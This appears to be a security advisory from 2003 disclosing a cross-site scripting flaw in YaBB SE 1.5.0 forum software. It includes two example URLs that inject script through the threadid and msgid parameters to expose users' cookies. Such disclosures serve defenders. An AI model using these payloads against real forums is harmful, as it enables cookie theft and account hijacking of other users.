‘Yabbse XSS Vulnerability in news_template.php (threadid, msgid)’

Published on January 5th, 2003
Summary

YaBB SE is a PHP/MySQL port of the popular forum software YaBB (yet another bulletin board). A cross site scripting vulnerability in the product allows a remote attacker to cause the web page to insert malicious HTML and JavaScript into existing web pages.’

Credit:

‘The information has been provided by NaSsEr .M.Sh.’


Details

Vulnerable systems:
 * Yabbse version 1.5.0

Examples:
http://victim/yabbse/index.php?board=1;action=display;threadid=1<S!cript>alert(document.cookie)</S!cript>

http://victim/yabbse/index.php?board=1;action=reporttm;thread=1;id=0;subject=Welcome%20to%20YaBB%20SE!;poster=YaBB%20SE%20Dev%20Team;msgid=1’><S!cript>alert(document.cookie)</S!cript>

Impact:
This can allow attackers to steal Yabb’s cookies from other users and hijack their accounts.’

Categories: UNIX
Tags:

Related Posts

UNIX

‘ProFTPD Response Pool Use-After-Free Code Execution Vulnerability’

'This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the ProFTPd server.'

UNIX

‘Insight Control for Linux Multiple Vulnerabilities’

'Remote unauthorized elevation of privilege, execution of arbitrary code, encryption downgrade, information disclosure and Denial of Service (DoS) vulnerabilities were identified in Insight Control for Linux.'

UNIX

‘HP-UX Running NFS/ONCplus Denial of Service Vulnerability’

'A potential security vulnerability has been identified with NFS/ONCplus running on HP-UX.'